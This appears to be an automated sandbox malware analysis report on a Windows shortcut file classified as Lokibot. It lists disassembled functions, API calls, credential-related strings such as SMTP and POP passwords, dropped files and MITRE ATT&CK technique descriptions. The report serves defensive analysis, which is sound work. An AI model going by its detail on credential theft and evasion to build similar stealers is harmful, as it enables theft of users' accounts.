Instruction Fuzzy Hash: 2B1106B1E116189BDB48CFAAD9406DEFBF7AFC8200F14C17AD508A7354EB305A418B95

Analysis Process: mjtjewi.exePID: 876, Parent PID: 6956COMMON

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.3%
Total number of Nodes:	302
Total number of Limit Nodes:	13

Executed Functions

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_mjtjewi.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_mjtjewi.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID:
API String ID: 3676486918-0
Opcode ID: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_mjtjewi.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_mjtjewi.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Function 00413A3F Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000,00000000,E567384D,00000000,00000000,?,00413B8D,00000000,?,?,004139CC,00000000), ref: 00413A54

Memory Dump Source

Source File: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_mjtjewi.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
Instruction ID: a51fc36abc950c8e07eb8ba8f8e19e2949325f4e0a3e122df0d5a7568418e784
Opcode Fuzzy Hash: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
Instruction Fuzzy Hash: 52B092B11042087EAA402EF19C05D3B3A4DCA44508B0044357C08E5422E936EE2050A4

Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_mjtjewi.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Non-executed Functions

Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_mjtjewi.jbxd

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON

Download Yara Rule

Strings

SmtpAccount, xrefs: 0040D0FA
EmailAddress, xrefs: 0040D074
SmtpPort, xrefs: 0040D0EB
SmtpPassword, xrefs: 0040D117
PopPassword, xrefs: 0040D0D0
Technology, xrefs: 0040D08D
SmtpServer, xrefs: 0040D0DC
PopServer, xrefs: 0040D099
PopAccount, xrefs: 0040D0B6
PopPort, xrefs: 0040D0A7

Memory Dump Source

Source File: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_mjtjewi.jbxd

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Function 00402B7C Relevance: 2.5, APIs: 2, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_mjtjewi.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_mjtjewi.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Function 0040317B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_mjtjewi.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

Function 004061C3 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 151COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261

Strings

IDA, xrefs: 00406304
IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B

Memory Dump Source

Source File: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_mjtjewi.jbxd

Yara matches

Similarity

API ID: _wmemset$ErrorLast
String ID: IDA$IDA
API String ID: 887189805-2020647798
Opcode ID: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_mjtjewi.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Comprobante.lnk.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\mjtjewi.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1xhwed1k.oda.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_unwrbiun.5ww.psm1

C:\Users\user\AppData\Roaming\188E93\31437F.exe (copy)

C:\Users\user\AppData\Roaming\188E93\31437F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\6c132e98e5a06fd825caf0498d9711c3_9e146be9-c76a-4720-bcdb-53011b87bd06

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3BDBEQO9NFNA05DW626L.temp

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7b78f1e09efa3ae5.customDestinations-ms (copy)

C:\Users\user\Desktop\mjtjewi.exe

Static File Info

General

File Icon

Static Windows Shortcut Info

General

Windows Analysis Report
Comprobante.lnk.lnk

Function 015246C0 Relevance: 6.6, Strings: 5, Instructions: 302
COMMON

Function 02DF92B9 Relevance: 4.1, Strings: 3, Instructions: 311
COMMON

Function 02DF92E0 Relevance: 4.1, Strings: 3, Instructions: 308
COMMON

Function 02DF7053 Relevance: 4.0, Strings: 3, Instructions: 218
COMMON

Function 015245F1 Relevance: 2.9, Strings: 2, Instructions: 375
COMMON

Function 0152459F Relevance: 2.9, Strings: 2, Instructions: 375
COMMON

Function 01522462 Relevance: 2.7, Strings: 2, Instructions: 240
COMMON

Function 02DF7088 Relevance: 2.7, Strings: 2, Instructions: 201
COMMON

Function 015224D8 Relevance: 2.7, Strings: 2, Instructions: 195
COMMON

Function 0152B5B8 Relevance: 2.7, Strings: 2, Instructions: 156
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre